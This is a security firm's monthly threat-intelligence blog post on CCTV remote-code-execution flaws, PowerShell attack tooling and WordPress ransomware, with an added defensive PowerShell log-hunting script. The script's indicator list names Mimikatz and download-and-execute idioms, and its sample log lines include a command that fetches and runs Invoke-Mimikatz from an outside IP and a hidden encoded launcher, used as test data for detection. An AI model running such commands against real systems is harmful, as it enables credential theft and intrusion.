This entry is the monthly continuation of Anitian’s series of threat intelligence insights from our Sherlock Managed Threat Intelligence team. The purpose of these briefings is to publish some of the significant campaigns that our team of Sherlocks are tracking at this time.
Leap year February gave us an extra day of patch notes, CVE releases, and vulnerabilities to sift through. The pace of those releases has increased considerably over the last few months, indicative both of a rise in the number of vulnerabilities and of the explosive growth of platforms that have them. Verifiable threats in the Internet of Things (IoT) space had been hibernating for a while. It is fair to say that, like the groundhog, IoT has come out of its hole and decided to start grabbing acorns.
Below are some notable hunts our Sherlocks have gathered over the last month.
CCTV RCE WTF?!
WHAT: The big IoT story this month was the recent disclosure that CCTV devices contain remote code execution vulnerabilities. There are allegations that some of these systems have been used as a beachhead into payment systems.
WHY: It is tempting to ignore these vulnerabilities since the vendors of these devices have tight control over the firmware. However, that is not a reasonable response. While you can outsource a technology (or task), you cannot outsource responsibility. These IoT vulnerabilities embody a double-edged challenge: on one hand, you must hold technology vendors accountable for their code and patch IoT devices quickly. On the other hand, you must also ensure that these vendor-controlled devices do not have any discretionary network access. IoT devices such as CCTV cameras have no compelling business reason to reach anything beyond their recorder and management host, so broad network access is a liability, not a feature. This makes network segmentation and core firewalls a vital part of any security program.
Due to the increase in attacks against these IoT devices, our team has been hunting for any unusual network traffic originating from these devices or their networks.
With Great PowerShell Comes Great Responsibility
WHAT: Nearly ten years ago (now I really feel old), Microsoft released PowerShell, an extraordinarily potent command line shell for Windows. It has gained slow but steady traction as a tool for doing all manner of administrative work. It has also gained traction among “the bad guys” (and us good guys doing professional bad guy work). If you want to compromise a Windows box, running PowerShell scripts is a most excellent way to do it.
WHY: PowerShell enables attackers to do many nasty things with great ease, speed, and efficiency. Some of these techniques are being closed off by improvements to the Windows OSes, but in the meantime the bulk of the world can still fall to tools like PowerSploit, Mimikatz and more. Many versions of PowerShell leave behind traces of this mischief in the PowerShell event logs, and the traces are far richer on hosts where module and script block logging have been turned on.
As such, this month we launched a campaign to scan PowerShell logs for evidence of these attacks. Sometimes what we find is not a compromise but some creative scripting by the system administrators, which has the unfortunate side effect of leaving the system wide open to attack.
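The kind of log sweep described above, as an added example rather than Anitian's own hunting tooling: a short PowerShell script that pulls script block logging events (ID 4104, Windows PowerShell 5.x with Script Block Logging enabled) and engine start events (ID 400, whose HostApplication field carries the powershell.exe command line) and matches them against a constructed list of tradecraft indicators. The indicator list, the function names and the sample log lines are assumptions made for this example, not artifacts from a real case.

```powershell
# Added example, not Anitian's code. Hunts local PowerShell event logs for offensive tradecraft.
# Assumes Windows PowerShell 5.x; event 4104 only exists when Script Block Logging is enabled,
# event 400 is present on older engines too. Indicators and sample lines below are constructed.

# Constructed indicators: cmdlet names from PowerSploit / Mimikatz wrappers and the
# download-and-execute / encoded-command idioms that usually precede them.
$Indicators = @(
    'Invoke-Mimikatz',
    'Invoke-Shellcode',
    'Invoke-ReflectivePEInjection',
    'sekurlsa::logonpasswords',
    'DownloadString\(',
    'FromBase64String\(',
    '-enc(odedcommand)?\s',                 # -EncodedCommand / -enc launcher
    '-nop\s.*-w(indowstyle)?\s+hidden',     # -NoProfile ... -WindowStyle Hidden launcher
    'System\.Reflection\.Assembly\]::Load'
)

function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$Text)
    # Emits every indicator pattern that matched; emits nothing when the text is clean.
    # -match is case-insensitive by default, which matters because attackers vary case.
    foreach ($Pattern in $Indicators) {
        if ($Text -match $Pattern) { $Pattern }
    }
}

function Get-PowerShellHunt {
    param([datetime]$Since = (Get-Date).AddDays(-30))
    # 4104: the script block text as compiled (survives obfuscation of the outer command line).
    # 400:  engine start; HostApplication holds the full powershell.exe command line, so
    #       -EncodedCommand shows up here even on hosts without script block logging.
    $Events = @()
    $Events += Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since
    } -ErrorAction SilentlyContinue
    $Events += Get-WinEvent -FilterHashtable @{
        LogName = 'Windows PowerShell'; Id = 400; StartTime = $Since
    } -ErrorAction SilentlyContinue

    foreach ($Event in $Events) {
        $Hits = @(Test-SuspiciousPowerShell -Text $Event.Message)
        if ($Hits.Count -gt 0) {
            $Flat = $Event.Message -replace '\s+', ' '
            [pscustomobject]@{
                TimeCreated = $Event.TimeCreated
                Computer    = $Event.MachineName
                EventId     = $Event.Id
                Indicators  = ($Hits -join ', ')
                Snippet     = $Flat.Substring(0, [math]::Min(160, $Flat.Length))
            }
        }
    }
}

# Constructed sample messages (not real captures) so the matcher can be exercised offline.
$Samples = @(
    'Creating Scriptblock text (1 of 1): IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds',
    'HostApplication=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'Creating Scriptblock text (1 of 1): Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB }'
)
foreach ($Sample in $Samples) {
    $Hits = @(Test-SuspiciousPowerShell -Text $Sample)
    $Verdict = if ($Hits.Count -gt 0) { 'SUSPECT' } else { 'clean' }
    '{0,-8} {1}' -f $Verdict, ($Hits -join ', ')
}

# Live hunt over the local host (needs rights to read the event logs):
# Get-PowerShellHunt -Since (Get-Date).AddDays(-7) | Format-Table -AutoSize
```

Two caveats a practitioner should keep in mind. First, event 4104 is only written when Script Block Logging is enabled (Group Policy: Turn on PowerShell Script Block Logging), so a host that has never had it switched on yields only the 400 engine events. Second, if the PowerShell 2.0 engine is still installed, an attacker can launch `powershell.exe -Version 2` and bypass the newer logging entirely, so the engine version reported in the 400 event is itself worth alerting on.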
WordPress Rampant Ransomware
WHAT: I yearn for a month in which we do not have to mention the big three: Flash, Java, or WordPress. This is not that month. While the latest GLIBC kerfuffle and the uptick in exploit kit use were interesting, is it possible to ignore a juicy WordPress vulnerability? Certainly not when it comes from ransomware creators. In February the ransomware writers repurposed some old Critroni code to hit WordPress sites to the tune of about $400 each.
WHY: This is a notable trend we have seen lately: malware creators repurposing existing or longstanding malware in new and destructive ways. While this particular specimen may be relatively low impact (because we all back up our WordPress sites religiously, right?!), ransomware has become extremely popular in the last few months.
As such, our WordPress hunts have been active this month and will likely remain that way for the foreseeable future. We are also conducting targeted hunts around common ransomware tactics and behaviors.
Chasing threats is never comfortable or easy. The threat landscape is extremely volatile right now. It takes constant vigilance to stay on top of the attackers. That’s what we do at Anitian Sherlock.
As always, we welcome your thoughts and feedback. And check back next month for our April Sherlock report.